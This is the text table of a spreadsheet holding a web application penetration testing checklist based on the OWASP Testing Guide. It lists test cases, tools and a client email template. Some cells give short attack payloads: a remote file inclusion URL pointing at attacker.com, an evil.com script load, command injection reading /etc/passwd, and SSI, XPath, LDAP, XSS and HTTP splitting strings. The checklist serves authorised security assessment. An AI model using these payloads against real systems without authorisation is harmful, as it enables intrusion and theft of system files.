5) Predictable coupon codes
6) Failure of a recomputation in coupon value after partial order cancellation
7) Illegitimate use of coupons with other products</t>
  </si>
  <si>
    <t>Payment gateway integration flaws</t>
  </si>
  <si>
    <t>1) Price modification at client-side with zero or negative values
2) Price modification at client-side with varying price values
3) Manipulating the contact URL
4) Bypassing the third-party checksum
5) Changing the price before the transaction is completed</t>
  </si>
  <si>
    <t>Content management system flaws</t>
  </si>
  <si>
    <t>1) Flaws in transaction file management
2) Unusual activities involving role-based access control (RBAC), which regulates access to computer or network resources
3) Flaws within the customer notification system
4) Misuse of rich-text editor functionalities (which edit text within web browsers)
5) Flaws in third-party application program interfaces (APIs), which are used to create specialized web stores
6) Flaws in integration with point-of-sale (POS) devices</t>
  </si>
  <si>
    <t>OWASP: Testing Guide Checklist</t>
  </si>
  <si>
    <t>Customer ID:</t>
  </si>
  <si>
    <t>Project ID:</t>
  </si>
  <si>
    <t xml:space="preserve">Asset: </t>
  </si>
  <si>
    <t xml:space="preserve">Tester Name: </t>
  </si>
  <si>
    <t>Cyber_Security_Assurance_Services</t>
  </si>
  <si>
    <t>Mandatory Scans/Email</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>POC</t>
  </si>
  <si>
    <t>Questionnaire Preparation</t>
  </si>
  <si>
    <t xml:space="preserve">Fill out the questionaire with the gathered information from client. Inform the missing requirements immediately. </t>
  </si>
  <si>
    <t>Burp Suite Professional (Scanner)</t>
  </si>
  <si>
    <t>Scan the Web Application with Burp Suite Professional scanner. (Conduct Authenticated scan if Applicable.). Verify the presence of WAF by installing WAF detector burp plugin. Immediatly inform client to whitelist our IP addresses. </t>
  </si>
  <si>
    <t>OWASP ZAP</t>
  </si>
  <si>
    <t>Scan the Web Application with OWASP ZAP.</t>
  </si>
  <si>
    <t>Nexpose</t>
  </si>
  <si>
    <t xml:space="preserve"> ( common ports if not deployed in VPS). Otherwise web ports.</t>
  </si>
  <si>
    <t>Create User Story</t>
  </si>
  <si>
    <t>Dirb, DirBuster, GoBuster</t>
  </si>
  <si>
    <t>Fuzz the Web Application with Dirb/DirBuster/GoBuster for files/directories.</t>
  </si>
  <si>
    <t>Application Logs</t>
  </si>
  <si>
    <t>Send email to client asking for Application Logs (Use below template)
As part of Web Application assessment we have executed different kinds of automated tests today , we will continue with the manual validation of the same in coming days. We need a report from your SOC team on the different types of application attacks they have noticed today to fulfill the requirement of OWASP 2017 - A10( A10:2017-Insufficient Logging&amp;Monitoring). We need proof of all kinds of attacks performed either as raw logs of WAF/IPS/Proxy or as SIEM reports with the attacker details, in addition to this we will be collecting the application logs and will also be generating different error messages in application with fuzzing.
 In case your SOC is not able to get the details of the attack it will be reported as OWASP top 10 application vulnerability, this may invite compliance issues in external audits later. Thank you very much for your cooperation and support.</t>
  </si>
  <si>
    <t>Tool Vulnerability Report</t>
  </si>
  <si>
    <t>Prepare XL based on scan results. Format is in next excel sheet.</t>
  </si>
  <si>
    <t>Send all forms to SQLMap</t>
  </si>
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery (Public PT only)</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Google Hacking</t>
  </si>
  <si>
    <t>Shodan Check</t>
  </si>
  <si>
    <t xml:space="preserve">If the web application is publically available, Check for vulnerabilities in Shodan. </t>
  </si>
  <si>
    <t>https://www.shodan.io</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>Check burp response header</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Analyze robots.txt.</t>
  </si>
  <si>
    <t>Check manually. Check hidden directories</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>Verify source code manually</t>
  </si>
  <si>
    <t>Fingerprint Web Application</t>
  </si>
  <si>
    <t>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Whatweb, CMSmap</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>Install WAFDetect Burp plugin</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Manual analysis + dirb, nikto, burp, robots.txt</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>Nexpose detects</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t xml:space="preserve">Identify HSTS header on Web server through HTTP response header. 
</t>
  </si>
  <si>
    <t>Burp Detects
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Test RIA cross domain policy</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Burp Detects automatically</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>Identify manully with Burp Proxy</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>Identify manually with Burp Proxy. Check if same email can be used for different user resgistarations.</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>Depends on the application (Manual analysis)</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Manual Analysis, BruteForce, Metasploit Modules</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>Manual analysis. Verify guest account privileges</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t>Nexpose + Manual analysis</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.
http://web.archive.org/web/20150328012647/https:/www.whitehatsec.com/bAdmin/bAdmin.html
http://www.phenoelit.org/dpl/dpl.html
https://www.cirt.net/passwords</t>
  </si>
  <si>
    <t>Google search, Burp Proxy, Hydra, GHDB for product.</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking. Test Idle timeout &amp; user initiated timeout, Test for Deallocation of session data including session ID</t>
  </si>
  <si>
    <t>Bruteforce with 200 passwords. Final test case</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>Burp Proxy + Manual Analysis</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Look for passwords being stored in browser cache, web storage, cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?, Test whether passwords are stored in web storage.</t>
  </si>
  <si>
    <t>Login page. Check for remember me</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t xml:space="preserve">From a logged in page press logout and then press back button. </t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.
https://www.openwall.com/wordlists/
https://github.com/danielmiessler/SecLists
https://wiki.skullsecurity.org/Passwords</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse manually. Using change password or registration </t>
  </si>
  <si>
    <t>Testing for Weak security question/answer</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>Manual Analysis</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?, Test password rset link (Check whether it has an expiry, Check whether it is linked with a session ID, See whether it is replicable, Check whether it s a recyclable link, Predictable Token with in link)</t>
  </si>
  <si>
    <t>Manual Analysis.</t>
  </si>
  <si>
    <t>Testing for Captcha</t>
  </si>
  <si>
    <t>Testing for weak captcha, Testing for possibility of replay attacks, Testing for automated captcha attacks.
http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html
https://boyter.org/decoding-captchas/
https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008)
https://boingboing.net/2012/01/09/virtual-sweatshops-versus-capt.html
https://www.npr.org/templates/story/story.php?storyId=130594039?toryId=130594039
https://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/</t>
  </si>
  <si>
    <t>Testing for User Enumeration</t>
  </si>
  <si>
    <t>Test for valid user, Test for for nonexistent username
1. Cookies are deleted if user doesn't exist. Cookies are not deleted and or new cookies are set if user exist.
2. If user exists user goes to known specific  user  page, If user doesn't user goes to generic page that exist.
3. There is no change in HTML if the user does not exist, there is change in HTML if the user exists.
4. Time based analysis.
The response time will be different for user exists in DB and user does not exists in DB.
5. Burp comparer can be used for analyzing the difference in response.</t>
  </si>
  <si>
    <t>Burp proxy + Manual Analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>Testing Directory traversal/file include</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t xml:space="preserve"> Wfuzz.
Use the below wordlist : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Traversal%20directory/directory_traversal.txt</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Try to access admin functionalities with low privilage user.</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse all cookies strength in burp sequencer </t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>Burp automated scan will detect this. Verify manually and take proxy.</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>Ensure that cookie is set after login.</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>Check if session tokens are passed in URL</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Check if csrf token is implemented. Burp genetrate CSRF POC.</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>After logout, send old  request from burp history.</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>Owasp verify</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Session Timeout Test burp plugin</t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t>SQL Injection - Oracle Testing</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>SQL Injection - MySQL Testing</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t>SQL Injection - SQL Server Testing</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>SQL Injection - Testing PostgreSQL</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>SQL Injection - MS Access Testing</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>SQL Injection - Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Burp Proxy, BeEF, MSF</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, netcat</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t>•Looking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</si>
  <si>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Test for Process Timing</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</si>
  <si>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</si>
  <si>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Test Number of Times a Function Can be Used Limits</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</si>
  <si>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</si>
  <si>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Testing for the Circumvention of Work Flows</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</si>
  <si>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</si>
  <si>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Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types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</si>
  <si>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</si>
  <si>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Test Upload of Malicious Files</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</si>
  <si>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</si>
  <si>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Client Side Testing</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t>Testing WebSockets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</si>
  <si>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</si>
  <si>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Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>Test Web Messaging</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>Test Local Storage</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>leakix - https://leakix.net/</t>
  </si>
  <si>
    <t>Activity</t>
  </si>
  <si>
    <t>Spier/crawl</t>
  </si>
  <si>
    <t>Check to metafiles</t>
  </si>
  <si>
    <t>Review webpage comments</t>
  </si>
  <si>
    <t>Identify web application framework and technologies used</t>
  </si>
  <si>
    <t>Fingerprint web server</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t xml:space="preserve">Identify Web services </t>
  </si>
  <si>
    <t>Configuration Management</t>
  </si>
  <si>
    <t>Check for commonly used administrative URLs</t>
  </si>
  <si>
    <t>Check for old backups and unreferenced files</t>
  </si>
  <si>
    <t>Check for HTTP methods</t>
  </si>
  <si>
    <t>Check for Cross Site Tracing (XST)</t>
  </si>
  <si>
    <t>Test file extensions handling</t>
  </si>
  <si>
    <t xml:space="preserve">Check for security HTTP headers e.g. X-frame-Options </t>
  </si>
  <si>
    <t>Test for sensitive data in client side code e.g API keys, credentials</t>
  </si>
  <si>
    <t>Secure Transmission</t>
  </si>
  <si>
    <t>Check SSL Version, algorithms and key length</t>
  </si>
  <si>
    <t>Check credentials are sent over HTTPS</t>
  </si>
  <si>
    <t>Login form is delivered over HTTPS</t>
  </si>
  <si>
    <t>Session Tokens are delivered over HTTPS</t>
  </si>
  <si>
    <t>Check if HSTS is in use</t>
  </si>
  <si>
    <t>Testing web messaging</t>
  </si>
  <si>
    <t>Authentication</t>
  </si>
  <si>
    <t>Testing for weak passwords</t>
  </si>
  <si>
    <t>Testing Remember Me functionality</t>
  </si>
  <si>
    <t>Test password reset &amp; recovery</t>
  </si>
  <si>
    <t>Testing CAPTCHA</t>
  </si>
  <si>
    <t>Testing Multi factor authentication</t>
  </si>
  <si>
    <t>Test for logout functionality presence</t>
  </si>
  <si>
    <t>Test for default logins and passwords</t>
  </si>
  <si>
    <t>Test for consistent authentication across applications with shared authentication schema/SSO and alternative channels</t>
  </si>
  <si>
    <t>Testing for weak security question</t>
  </si>
  <si>
    <t>Testing user enumeration</t>
  </si>
  <si>
    <t>Testing authentication bypass</t>
  </si>
  <si>
    <t>Testing for brute force protection</t>
  </si>
  <si>
    <t>Session Management</t>
  </si>
  <si>
    <t>Check session IDs for cookie flags (httpOnly and secure)</t>
  </si>
  <si>
    <t>Check session cookie scope (path and domain)</t>
  </si>
  <si>
    <t>Check session cookie duration (expires and max-age)</t>
  </si>
  <si>
    <t>Check session termination after a maximum lifetime</t>
  </si>
  <si>
    <t>Check session termination after relative timeout</t>
  </si>
  <si>
    <t>Check session termination after logout</t>
  </si>
  <si>
    <t>Test to see if users can have multiple simultaneous sessions</t>
  </si>
  <si>
    <t>Test session cookies for randomness</t>
  </si>
  <si>
    <t>Confirm that new session tokens are issued on login, role change, and logout</t>
  </si>
  <si>
    <t>Test for consistent session management across applications with shared session management</t>
  </si>
  <si>
    <t>Test for CSRF and clickjacking</t>
  </si>
  <si>
    <t>Authorization</t>
  </si>
  <si>
    <t>Test for path traversal</t>
  </si>
  <si>
    <t>Test for vertical access control problems (a.k.a. privilege escalation)</t>
  </si>
  <si>
    <t>Test for horizontal access control problems (between two users at the same privilege level)</t>
  </si>
  <si>
    <t>Test for missing authorization</t>
  </si>
  <si>
    <t>Test for insecure direct object references</t>
  </si>
  <si>
    <t>Check for weak algorithms usage</t>
  </si>
  <si>
    <t>Check for proper use of salting</t>
  </si>
  <si>
    <t>Check for randomness functions</t>
  </si>
  <si>
    <t>Data Validation</t>
  </si>
  <si>
    <t>Test for HTML Injection</t>
  </si>
  <si>
    <t>Test for SQL Injection</t>
  </si>
  <si>
    <t>Test for LDAP Injection</t>
  </si>
  <si>
    <t>Test for ORM Injection</t>
  </si>
  <si>
    <t>Test for XML Injection</t>
  </si>
  <si>
    <t>Test for XXE Injection</t>
  </si>
  <si>
    <t>Test for SSI Injection</t>
  </si>
  <si>
    <t>Test for XPath Injection</t>
  </si>
  <si>
    <t>Test for IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>Test for Code Injection</t>
  </si>
  <si>
    <t>Test for Command Injection</t>
  </si>
  <si>
    <t>Test for NoSQL injection</t>
  </si>
  <si>
    <t>Test for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for Format String</t>
  </si>
  <si>
    <t>Test for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>Test for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Test for Open Redirection</t>
  </si>
  <si>
    <t>Test for Local File Inclusion</t>
  </si>
  <si>
    <t>Test for Remote File Inclusion</t>
  </si>
  <si>
    <t>Denial of Service</t>
  </si>
  <si>
    <t>Testing for HTTP DOS attack</t>
  </si>
  <si>
    <t>Testing for account lockout</t>
  </si>
  <si>
    <t>File Upload</t>
  </si>
  <si>
    <t>Test that acceptable file types are whitelisted and non-whitelisted types are rejected</t>
  </si>
  <si>
    <t>Test that file size limits, upload frequency and total file counts are defined and are enforced</t>
  </si>
  <si>
